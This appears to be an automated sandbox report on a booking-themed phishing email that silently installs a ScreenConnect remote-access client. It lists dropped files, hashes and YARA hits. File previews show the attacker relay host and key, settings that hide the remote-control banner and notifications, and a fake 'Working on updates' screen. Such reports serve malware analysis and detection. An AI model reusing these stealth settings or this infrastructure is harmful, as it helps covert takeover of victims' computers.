| C:\Users\user\AppData\Local\Temp\MSI436F.tmp-\ScreenConnect.InstallerActions.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\MSI436F.tmp-\ScreenConnect.Windows.dll | 0% | ReversingLabs | | |
| C:\Windows\Installer\MSI512D.tmp | 0% | ReversingLabs | | |
                      No Antivirus matches
                      No Antivirus matches
                                                                                                                          • No. of IPs < 25%
                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                          • 75% < No. of IPs
                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                          IP
                                                                                                                          127.0.0.1
                                                                                                                          192.168.2.16
                                                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                                                          Analysis ID:1632450
                                                                                                                          Start date and time:2025-03-07 23:32:05 +01:00
                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                          Overall analysis duration:
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                          Number of analysed new started processes analysed:39
                                                                                                                          Number of new started drivers analysed:0
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:1
                                                                                                                          Technologies:
                                                                                                                          • EGA enabled
                                                                                                                          Analysis Mode:stream
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Sample name:Dear david@corerecon.com - Your Stay Has Been Successfully Booked Ocean Breeze Retreat.msg
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal76.evad.winMSG@84/84@92/211
                                                                                                                          Cookbook Comments:
                                                                                                                          • Found application associated with file extension: .msg
                                                                                                                          • Exclude process from analysis (whitelisted): svchost.exe
                                                                                                                          • Excluded IPs from analysis (whitelisted): 2.19.11.103, 2.19.11.102, 52.123.129.14
                                                                                                                          • Excluded domains from analysis (whitelisted): ecs.office.com, omex.cdn.office.net, dual-s-0005-office.config.skype.com, login.live.com, ecs.office.trafficmanager.net, omex.cdn.office.net.akamaized.net, a1864.dscd.akamai.net
                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                          • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                          • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                          • Timeout during stream target processing, analysis might miss dynamic analysis data
                                                                                                                          • VT rate limit hit for: bookinginvoiceview.com
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:data
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):219728
                                                                                                                          Entropy (8bit):6.583473654268572
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:9D5E0BA436FB770869D9F258B2CCAD87
                                                                                                                          SHA1:58A10A08616ACF0627C3563238D119A02ECACA86
                                                                                                                          SHA-256:E0EEC8F6E28AAC4B251B3BD15007901425E019B969F62719AB13F1B4D80B696F
                                                                                                                          SHA-512:769B28334347110C3F8901243029CE4021A21C19FC9C21EB0B3480B5CB6E5FE61746CD4DC9677692BBBBDA35E1AAFCE62E39421B23FB3EE8C45EBD333F430957
                                                                                                                          Malicious:false
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\564c4a.rbs, Author: Joe Security
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:...@IXOS.@.....@=.gZ.@.....@.....@.....@.....@.....@......&.{4B6C036E-28DA-1655-4F4C-DB2C91ACA822}'.ScreenConnect Client (d241e538b9eb3f0a)..ScreenConnect.ClientSetup.msi.@.....@.....@.....@......DefaultIcon..&.{4B6C036E-28DA-1655-4F4C-DB2C91ACA822}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (d241e538b9eb3f0a)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{D2F68EAD-292A-9089-63C0-8EAF92A6C63B}&.{4B6C036E-28DA-1655-4F4C-DB2C91ACA822}.@......&.{BD5627A3-7902-96F8-0A61-8DBE6A166677}&.{4B6C036E-28DA-1655-4F4C-DB2C91ACA822}.@......&.{0D7A6851-490B-572E-514A-79D15C14EAE4}&.{4B6C036E-28DA-1655-4F4C-DB2C91ACA822}.@......&.{134E2D94-82C1-F171-24AC-832C505E6215}&.{4B6C036E-28DA-1655-4F4C-DB2C91ACA822}.@......&.{8A7F623B-496C-5496-9BC5-82C4296F265D}&.{4B6C036E-28DA-1655-4F4C-DB2C91ACA822}.@......&.{408E9CF8-C237-1BAC-BF92-66E5B5F4F6D9}&.{4B6C036E-28DA-1655-4F4C
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):274
                                                                                                                          Entropy (8bit):4.95901923679848
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:A7FF934654DA515C71CB9A92CF099DE3
                                                                                                                          SHA1:D5B84E84F229F87B339BEAD69B3C3FD72057BFA9
                                                                                                                          SHA-256:379A3D60B9244CD7B2AEF026C673942AAF3AF05BA69E365DBF77FC01898D6998
                                                                                                                          SHA-512:1FBB8260271AA96BCEF788E4FEC4B12C390DED28FD26076A605616B9043509BCF1B9BFFEBDAC9D64C4C8DFDE1076FC8DE7DEAC9D2C7BAC78803D2D87E1EE2DF9
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..n_........ A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e....../Working on updates Do not turn off your system.
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):256
                                                                                                                          Entropy (8bit):4.87918536836454
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:2C73A3C54403DB59AB05C34470A0F32F
                                                                                                                          SHA1:76046571223DEDEE79FDD449034AD2F28F9D3405
                                                                                                                          SHA-256:7235B66477556F7C7A449CB22F9AEBD85F2770249D133C01228947CCBD6957B9
                                                                                                                          SHA-512:E37DCE2F83626761D36E449CB0E8D9C5611FC8766F842EB724B7D072AF9C9115A81494A947CB8D0ED0E5FF48BA8B0A355F9EB3A707B0820CAD5EBB59A801F360
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..........6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.......#097DCA
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):50133
                                                                                                                          Entropy (8bit):4.759054454534641
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                                          SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                                                          SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                                          SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):26722
                                                                                                                          Entropy (8bit):7.7401940386372345
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                          SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                          SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                          SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):197120
                                                                                                                          Entropy (8bit):6.586596996537647
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:FF388E261FCB88BB2FB4295B4E84BE66
                                                                                                                          SHA1:622E9B646881E4606A9A82D06E48329CFEBE83AA
                                                                                                                          SHA-256:8872211A8F4FF520D9D3342ED3841EB6FE42F6D83A0F639F6BAF84795DA99DE2
                                                                                                                          SHA-512:8D52B6FB173714F026DF687064A20F42AC7C016FF9E41E941737D3A5159A0027D5ACF420BC03F5BCDE59CDB21586A77E491DF26528B87B550E880CF7AB8A3929
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):68608
                                                                                                                          Entropy (8bit):6.065078337244406
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:FFEDBAC44FE3AF839D5AE3C759806B2C
                                                                                                                          SHA1:71E48C88DFFFE49C1C155181E760611C65F6CA50
                                                                                                                          SHA-256:42E0ADD27D20E2393F9793197798AC7D374812A6DCD290B153F879A201E546AF
                                                                                                                          SHA-512:533D9284C15C2B0BF4B135FC7E55A04139D83065282FD4AF54866B8B2B6966A0989D4ECF116B89A9B82D028EF446986AA1B92BB07B1521B1AEF15BA286B75358
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):95512
                                                                                                                          Entropy (8bit):6.50433047723113
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:D3E628C507DC331BAB3DE1178088C978
                                                                                                                          SHA1:723D51AF347D333F89A6213714EF6540520A55C9
                                                                                                                          SHA-256:EA1CFAD9596A150BEB04E81F84FA68F1AF8905847503773570C901167BE8BF39
                                                                                                                          SHA-512:4B456466D1B60CDA91A2AAB7CB26BB0A63AAA4879522CB5D00414E54F6D2D8D71668B9E34DFF1575CC5B4C92C61B9989ABBE4B56A3E7869A41EFCC45D23CA966
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):549888
                                                                                                                          Entropy (8bit):6.035933098806984
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:665A8C1E8BA78F0953BC87F0521905CC
                                                                                                                          SHA1:FE15E77E0AEF283CED5AFE77B8AECADC27FC86CF
                                                                                                                          SHA-256:8377A87625C04CA5D511CEEC91B8C029F9901079ABF62CF29CF1134C99FA2662
                                                                                                                          SHA-512:0F9257A9C51EB92435ED4D45E2EAAA0E2F12983F6912F6542CC215709AE853364D881F184687610F88332ECA0F47E85FA339ADE6B2D7F0F65ADB5E3236A7B774
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):260168
                                                                                                                          Entropy (8bit):6.416438906122177
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:5ADCB5AE1A1690BE69FD22BDF3C2DB60
                                                                                                                          SHA1:09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
                                                                                                                          SHA-256:A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
                                                                                                                          SHA-512:812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):61208
                                                                                                                          Entropy (8bit):6.323262945280686
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:E34E8690E53141EE6914238252FA9988
                                                                                                                          SHA1:B772AEF5386F2D688B249935F13BB430C5088FA9
                                                                                                                          SHA-256:BBE9AE87E2DBA00C5E2F78DC742608862D03F72246669C7FCB01C5646A6DF10B
                                                                                                                          SHA-512:06A64527EB281FE5241A7B43BCCBBA9983F05712ED9719D5720062B88731801EACEC66C0D326E57D93D1E526FB29B432F65D50E500AF7DBF53DC5FDC5145C479
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):602392
                                                                                                                          Entropy (8bit):6.179559387432912
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:AFA993C978BC52D51E8AF08A02892B4E
                                                                                                                          SHA1:6D92666AE52761AD1E6C5FBB8E1355354516BED7
                                                                                                                          SHA-256:08EFE3E41BD508E2E9C3F8CF4D466CB1C96C35C1B463E79F2A24AC031AB79B48
                                                                                                                          SHA-512:D9D17361CB3C24F640086EFD97F42B15B642917898879710D35B58F8F746B51936518FBDE1F1FB45C1D524BCBEBA74B4CBDE7F32308AF8CC7A8149A6EEDE18F2
                                                                                                                          Malicious:false
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):266
                                                                                                                          Entropy (8bit):4.842791478883622
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                          SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                          SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                          SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):851968
                                                                                                                          Entropy (8bit):6.24337607810325
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:41B8D757CBC2351FD9C0BF56AEDEDE06
                                                                                                                          SHA1:10B528623A517C71956D0C50C4EBA086988AF615
                                                                                                                          SHA-256:86432F33567EF172674FD7A828AFA6A62E9D90EFC8DBA6199D803B0888D35E1B
                                                                                                                          SHA-512:246F6D3A3CCEE1C33713B564FF36E02A3BC594AD372DEEA9D7FB631F9F4F71FC5E5B0CC7F592B667BA5D731365A2B2992D3A95E434AE50FD58BA25E0D8BE13A7
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):81688
                                                                                                                          Entropy (8bit):5.862062649096442
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:8531526B6F151A08AD8A551611F686D3
                                                                                                                          SHA1:D4A6ABD7256F7624953992ECFE9C6EFBF2529180
                                                                                                                          SHA-256:1BBBE38D4F1193B0AE098BF1BDCE00761EDCD555D0D77F2A33DA6D271FAE4BF0
                                                                                                                          SHA-512:5F5BD79A25ABD20F4E74E128E801C3B852AEDBC4DA0F7A9F8CC72496564010115BC1A098D929597128C757286024B372E2DFFBE5BE6A562F921D70C7F0B81283
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2073
                                                                                                                          Entropy (8bit):4.716574961948895
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:B5CD4F5F28CEF1887E608D73ABA030DE
                                                                                                                          SHA1:4399F46347DE02EEA2EB4483CBDA12053977E38E
                                                                                                                          SHA-256:39B69AD4AE0B8D8FBF296E9BD7FAF94ACC9168CA776DB3799BC8428B672F945E
                                                                                                                          SHA-512:0E164C6184C54B8ACA57FBFC2C812F30050FF5333F509DD3F2D64E916E94FBAE76720A2695657F1002746B54A1F902B9EC78A995BAAD99451CC5B643AD679136
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="ShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnHide" serializeAs="String">..
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (452), with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):942
                                                                                                                          Entropy (8bit):5.790010894888992
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:366513CCD9491E1C5406ACA91795F396
                                                                                                                          SHA1:E509B2F435ECC293E7AC044E0AE590D1665B664F
                                                                                                                          SHA-256:B863C4A01CAF17DB59265323C7E7D89F7F6D5C1597A9C86C2C8A1B975A14F37C
                                                                                                                          SHA-512:B55EE35F019D254C440E81D156805C14C3B0DE7C222829EB7C2CE87425403BF6B612E3E719D67630EF1A82A09E818D34DAAC8ED2C328B03BFAEC00651EF4BC22
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=bookinghqsupport.top&amp;p=8041&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQCt6sszjYdR%2fljMO5hPN8Us4uYaE1KfX0EMr5MgD6WzfJDx5V16IAULD7anuBGtX0F3LF1idCdY6kpNAJJAQDV62l1xEtKhzqEJfLAHnrYNkI4IgddX3uDlj%2bQ5ccf18AynIy9sXt2XekatDPx%2bHEawZxuMC46pODU5uafzSkOJ3zhdQfKucobIYw%2f65wL6MiNAHyNGePUbZTnU97ItnoW%2bN22p2gzqZziqkFuuwABhjcLPNBQHLNuuKEC1vR2lxX3EzdRdKmLntP6LMt39dgW8sSIitIZom5OMFnV7U8H8LA819gdb3BqbA%2fSR%2fj57hzMJtK78Yzxu2%2fz9YPP9DzDB</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1310720
                                                                                                                          Entropy (8bit):0.8168885163361973
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:38B12EDC3B858C8BA404879A51A3881B
                                                                                                                          SHA1:C1B64CA434B494239B8AEEAD715EA5D339AE84C7
                                                                                                                          SHA-256:EA7256B1606732DCC1DD3B381A1FE7408575173C709390F6A51ECB7A283748E3
                                                                                                                          SHA-512:64C164CF7AB48BD92C7C467A92AE08FCC3333721E59CC0F3BBB669B3BF60DC7661E1A60BE7BF1CDEFF40E479B76C0C7957CD6DF8FB8360E1B4A1633BDA23161D
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:..6.........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................d6d6.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):16384
                                                                                                                          Entropy (8bit):0.07988155462698229
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:0444C10D97381FEB2A950560C372A1EC
                                                                                                                          SHA1:F284103A907DC03A5AC34D1BF94EBF57D7FF20EA
                                                                                                                          SHA-256:82DC09189D7F9E932AEEF13F75B5677F68155EF2A42693AEFC003C34FDDBDA9D
                                                                                                                          SHA-512:76D98F0A719BA7142EBA893F61A536FD54D90D7F9EBCDECEAD43FB919CC2F31628911209FCA42EF276883F3E49DC916603C73D51EF586A9EF8F48166D2E975C2
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4
                                                                                                                          Entropy (8bit):0.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:F1D3FF8443297732862DF21DC4E57262
                                                                                                                          SHA1:9069CA78E7450A285173431B3E52C5C25299E473
                                                                                                                          SHA-256:DF3F619804A92FDB4057192DC43DD748EA778ADC52BC498CE80524C014B81119
                                                                                                                          SHA-512:EC2D57691D9B2D40182AC565032054B7D784BA96B18BCB5BE0BB4E70E3FB041EFF582C8AF66EE50256539F2181D7F9E53627C0189DA7E75A4D5EF10EA93B20B3
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:....
                                                                                                                          Process:C:\Windows\System32\mmc.exe
                                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3413
                                                                                                                          Entropy (8bit):5.084486589571248
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:A726593A8261930E4786375106FC6BFE
                                                                                                                          SHA1:13916B1E1825549E9C36C64E35BACA204A83EF95
                                                                                                                          SHA-256:E6BFDFBB9A0649EA9D38DE4255C355C581097E6A1035A54943260B22AD45F172
                                                                                                                          SHA-512:B093A2513B2C4F8544093D6E983EC580E14625E1529BC3DB22C4011980CDF44A78443C22289B11A6ED0AFAE2786D480F94B354B71496EE022E439D2BDEFBEDD2
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:<html>.... <head>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8">.. <style>.. body {margin: 0; font: icon; color: windowtext; background:window; overflow:none}.. span {font:icon;}.. #FolderIcon {height:expression(TaskpadName.clientHeight + 10); width:100%;}.. #TaskpadName {font: caption; color:captiontext; margin-left:0; margin-right:0; margin-top: 0; width:100%; border:0; padding-left:3; padding-top:5; padding-bottom:7;}.. #DisplayNameElem {font:icon; padding-left:5px; padding-top:5px; padding-bottom:3px; padding-right:5px}.. #Details {padding-left: 12px; margin-top: 8px; overflow:auto}.. #DescriptionElem {padding-left: 12px; margin-top: 8px; overflow-y:scroll; overflow:auto}.. A:visited {color:expression(document.linkColor);}.. A:hover {color:expression(document.linkColor);}.. </style>.... <script language="javascript">.. var L_strNoItemSelected_Text
                                                                                                                          Process:C:\Windows\System32\mmc.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1835
                                                                                                                          Entropy (8bit):4.8246355222783786
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:BEE1758A485085BB8A121EB74BA7E96F
                                                                                                                          SHA1:8024492E1126B17F832E36C932D433200180B693
                                                                                                                          SHA-256:EDCAD5B1CE8A304B70B8C9EA57D4AEAB740D979FFA59243B943011CB1BA4D57E
